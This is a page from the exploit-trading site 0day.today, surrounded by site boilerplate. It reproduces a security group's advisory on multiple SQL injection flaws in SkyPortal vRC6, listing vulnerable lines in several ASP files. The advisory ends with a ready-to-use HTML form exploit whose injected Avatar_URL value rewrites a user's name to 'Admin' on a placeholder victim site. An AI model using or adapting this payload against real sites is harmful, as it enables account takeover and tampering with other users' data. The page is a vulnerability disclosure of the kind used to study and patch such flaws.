0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SkyPortal vRC6 Multiple Remote Vulnerabilities
============================================== SkyPortal vRC6 Multiple Remote Vulnerabilities ============================================== ###################################################################################### # # BugReport Security Research & Penetration Testing Group # # Title: [Sky Portal] Multiple SQL Injection Vulnerabilities # Vendor: http://skyportal.net # Exploitation: Remote with browser # Fix Available: Patched In Last Version In Vendor ####################################################################################### # Leaders : Shahin Ramezany & Sorush Dalili # Team Members: Alireza Hasani ,Amir Hossein Khonakdar, Hamid Farhadi # Country: Iran ######################## Bug Description ########################### Description: -------------------- A Lot Of Sql Injection Found And We Exploit One Of them A Registered User Can Change His/Her Name And Read All Other's Private Messages. Vulnerabilities: -------------------- +--> Multiple SQL Injection Vulnerabilities nc_top.asp Line 59 strDBNTFUserName = Mitoone injection bezane be functione line 60 iani isMbr() >>> test.htm but !??! this function is very crazy! -------------------------- user can delete all bookmarks inc_bookmarks.asp line 179 delSQL = "DELETE FROM "& strTablePrefix & "BOOKMARKS WHERE BOOKMARK_ID = " & delBkmk(ib) this file use from cp_main.asp --------------------------- inc_profile_functions.asp line 568,570,572,573 --------------------------- user can delete all SUBSCRIPTIONS> inc_SUBSCRIPTIONS.asp line 163 delSQL = "DELETE FROM "& strTablePrefix & "SUBSCRIPTIONS WHERE SUBSCRIPTION_ID = " & delBkmk(ib) executeThis(delSQL) this file use from cp_main.asp -------------------------- Html Exploit ------------------------------ <form action="http://[VICTIM URL]/cp_main.asp?mode=EditIt&cmd=9" method="post"> Photo_URL: <input type="text" name="Photo_URL" value="" size="200"/> <br /> Avatar_URL[injection goes here]: <input type="text" name="Avatar_URL" value="',M_Name='Admin',M_Username='Admin" /> <br /> LINK1[Also injection goes here]: <input type="text" name="LINK1" value="" /> <br /> LINK2[Also injection goes here]: <input type="text" name="LINK2" value="" /> <br /> Password: <input type="text" name="Password-d" value="YOU MUST ENTER YOUR HASHED PASSWORD HERE (For Ex: 123123 = defbfbd84d16387273dde914fd309c3b)" /> <br /> Email: <input type="text" name="Email" value="admin@bugreport.ir" /> <br /> Name: <input type="text" name="Name" value="Your Current Username" /> <br /> RECMAIL: <input type="text" name="RECMAIL" value="0" /> <br /> HideMail: <input type="text" name="HideMail" value="1" /> <br /> <br /> <input type="submit" /> </form> Credit: -------------------- BugReport Security Research & Penetration Testing Group # 0day.today [2024-11-15] #